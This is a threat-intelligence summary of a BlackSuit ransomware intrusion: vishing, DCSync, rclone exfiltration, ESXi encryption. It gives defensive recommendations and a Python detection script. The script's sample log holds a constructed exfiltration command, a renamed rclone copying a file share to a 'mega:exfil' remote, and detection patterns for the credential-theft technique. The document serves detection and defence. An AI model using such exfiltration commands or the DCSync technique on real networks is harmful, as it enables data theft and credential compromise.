Anatomy of an Attack: The BlackSuit Blitz at a Global Equipment Manufacturer
Category: Threat Alerts / Malware & Ransomware
Unit 42 documents a BlackSuit ransomware intrusion operated by the group it tracks as Ignoble Scorpius. Initial access came from credentials stolen through a vishing call, which the operators then used to log in to the corporate VPN. From there they ran DCSync to obtain privileged Active Directory credentials, moved laterally over RDP and SMB with tools such as Advanced IP Scanner and SMBExec, and established persistence with AnyDesk and a custom RAT, both launched from scheduled tasks. Mass encryption of roughly 60 ESXi hosts was orchestrated through Ansible. Data was exfiltrated with a renamed rclone binary, and CCleaner was run as anti-forensic cleanup. During the response, Cortex XDR coverage was expanded from 250 to 17,000 endpoints, the organization avoided paying the $20M ransom demand, and it transitioned to a managed detection and response (MDR) service. The case underscores how fast identity-centric ransomware operations move and the importance of privileged identity controls, complete EDR coverage, and hypervisor protections.
CORTEX Protocol Intelligence Assessment
Business Impact: Enterprise-wide disruption, potential IP/data loss, and high extortion pressure.
Technical Context: Credential theft (vishing→VPN), DCSync, AnyDesk persistence, rclone exfil, ESXi-wide encryption via Ansible.
Strategic Intelligence Guidance
- Mandate phishing-resistant MFA for remote access (VPN included); block legacy authentication; train the helpdesk to recognize social-engineering attempts and log password and MFA resets so they can be reviewed.
- Protect Active Directory: restrict who can log on to domain controllers, disable NTLM where possible, enforce Extended Protection for Authentication (EPA), and alert on DCSync, that is, directory replication (DRSUAPI/MS-DRSR) requests coming from accounts that are not domain controllers.
- Harden hypervisors and segment management networks (ESXi, vCenter, and any automation host such as an Ansible controller); alert on rclone execution, including renamed binaries identified by command line or PE metadata rather than file name, and on mass encryption activity on ESXi hosts.
- Ensure EDR coverage on every endpoint and server, since unmanaged hosts are where the attacker stages tooling; drill incident response, including a ransom negotiation playbook, before an incident.
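Two of the detections recommended above, DCSync and a renamed rclone binary, can be expressed as simple log logic. The following is an added example (not code from the Unit 42 report or from Cortex XDR) that runs over constructed Windows Security events: a DCSync shows up as Event 4662 requesting the directory replication control-access rights from a principal that is not a domain controller, and a renamed rclone shows up in Event 4688 through rclone's command-line grammar (a verb such as `copy` plus a `remote:path` argument or rclone-specific flags) regardless of what the executable was called. The pipe-delimited `EventID=...|Key=Value` layout, the sample events, and the account names are assumptions made for the example.

```python
"""
Detection sketch for two BlackSuit-case techniques: DCSync (Security Event
4662 carrying replication control-access rights) and a renamed rclone
binary (Security Event 4688, matched on command-line grammar, not file name).
Log layout and sample events are constructed for this example.
"""
import re
import shlex
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Well-known control-access-right GUIDs that a DCSync requests (MS-ADTS).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}

# rclone verbs and flags that rarely occur together in other Windows tooling.
RCLONE_VERBS = {"copy", "copyto", "sync", "move", "lsd", "lsjson", "config"}
RCLONE_FLAGS = {"--config", "--transfers", "--ignore-existing", "--auto-confirm",
                "--no-check-certificate", "--multi-thread-streams", "--bwlimit"}
# An rclone remote looks like "name:path"; a drive letter "C:\..." does not match.
REMOTE_RE = re.compile(r"^[A-Za-z0-9_-]+:[^\\]")

# Constructed sample log (assumed layout: EventID=...|Key=Value|...). Line 1 is
# normal DC-to-DC replication, line 2 is a DCSync by a user, line 3 is an
# unrelated 4662, line 4 is rclone renamed to svchost.exe, line 5 is the
# built-in cmd.exe copy, line 6 is rclone under its real name.
SAMPLE_LOG = r"""
EventID=4662|SubjectUserName=DC01$|SubjectDomainName=CORP|ObjectServer=DS|AccessMask=0x100|Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662|SubjectUserName=jsmith|SubjectDomainName=CORP|ObjectServer=DS|AccessMask=0x100|Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662|SubjectUserName=jsmith|SubjectDomainName=CORP|ObjectServer=DS|AccessMask=0x10|Properties={bf967aba-0de6-11d0-a285-00aa003049e2}
EventID=4688|NewProcessName=C:\Windows\Temp\svchost.exe|CommandLine=svchost.exe copy C:\Shares\Engineering mega:exfil --transfers 32 --ignore-existing --config C:\Windows\Temp\r.conf
EventID=4688|NewProcessName=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c copy C:\a.txt D:\b.txt
EventID=4688|NewProcessName=C:\Program Files\rclone\rclone.exe|CommandLine=rclone.exe sync D:\backups s3:corp-backups --bwlimit 10M
"""


@dataclass
class Event:
    event_id: int
    fields: dict


def parse_event(line: str) -> Event:
    """Split one 'EventID=...|Key=Value|...' line into an Event."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")  # first '=' only; values may contain '='
        fields[key] = value
    return Event(int(fields.pop("EventID")), fields)


def load_events(log: str) -> list:
    return [parse_event(ln) for ln in log.splitlines() if ln.strip()]


def detect_dcsync(events: list, allowed_principals: set) -> list:
    """
    Return (user, requested_rights) for 4662 events that request replication
    rights from a principal outside the allowlist. The allowlist should hold
    DC machine accounts and any legitimate sync account (e.g. Entra Connect).
    """
    allowed = {p.lower() for p in allowed_principals}
    findings = []
    for ev in events:
        if ev.event_id != 4662:
            continue
        props = ev.fields.get("Properties", "").lower()
        requested = sorted(g for g in REPLICATION_RIGHTS if g in props)
        user = ev.fields.get("SubjectUserName", "")
        if requested and user.lower() not in allowed:
            findings.append((user, requested))
    return findings


def detect_renamed_rclone(events: list) -> list:
    """
    Return (image_name, verb, renamed) for 4688 events whose command line reads
    like rclone: an rclone verb followed by a remote:path or an rclone flag.
    'renamed' is True when the image is not called rclone.exe.
    """
    findings = []
    for ev in events:
        if ev.event_id != 4688:
            continue
        image = PureWindowsPath(ev.fields.get("NewProcessName", "")).name.lower()
        tokens = shlex.split(ev.fields.get("CommandLine", ""), posix=False)
        if len(tokens) < 2:
            continue
        verb, args = tokens[1].lower(), tokens[2:]
        has_remote = any(REMOTE_RE.match(a) for a in args)
        has_flag = any(a.split("=")[0].lower() in RCLONE_FLAGS for a in args)
        if verb in RCLONE_VERBS and (has_remote or has_flag):
            findings.append((image, verb, image != "rclone.exe"))
    return findings


if __name__ == "__main__":
    evs = load_events(SAMPLE_LOG)
    print("DCSync:", detect_dcsync(evs, {"DC01$", "DC02$"}))
    print("rclone:", detect_renamed_rclone(evs))
```

The DCSync rule deliberately keys on the requested rights plus the requesting principal rather than on the tool, because Mimikatz, Impacket secretsdump and similar all produce the same 4662; keep the allowlist tight, since a compromised sync account would otherwise pass silently. The rclone rule needs both a verb and a remote or flag so that `cmd /c copy` and plain `copy` commands do not fire; where Sysmon Event 1 is available, its OriginalFileName field is an even stronger signal for a renamed binary.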
Impact
Data Volume: ~400 GB exfiltrated (approximate)
Financial: $20M ransom demanded
Intelligence Source: Anatomy of an Attack: The "BlackSuit Blitz" at a Global Equipment Manufacturer | Oct 15, 2025